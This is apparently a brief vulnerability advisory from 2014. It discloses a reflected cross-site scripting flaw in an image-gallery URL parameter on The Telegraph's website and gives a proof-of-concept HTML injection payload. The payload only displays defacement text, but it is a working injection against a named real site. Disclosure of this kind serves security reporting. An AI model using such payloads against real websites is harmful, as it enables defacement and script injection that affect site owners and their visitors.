The Telegraph website suffers from a cross site scripting vulnerability. The author was unable to get a response from them and is releasing the details.
c7c9dc4aba767147fa0567b50208e10db6efc702eac4f87f9312c857efc107f8
================================================================================
Cross Site Scripting on The Telegraph
================================================================================
# Site: www.telegraph.co.uk
# Date: 25/02/2014
# Author: s4r4d0
# Contact: s4r4d0[at]yahoo[dot]com
# Team: Fatal Error
# Twitter: @FatalErrorSec
# Made in Brazil
================================================================================
[~] PoC :
# Site: www.telegraph.co.uk
# File: /news/picturegalleries/3167583/Iconic-Dresses.html?image=
# XSS: ">><marquee><h1>XSS By Fatal Error</h1><marquee>
================================================================================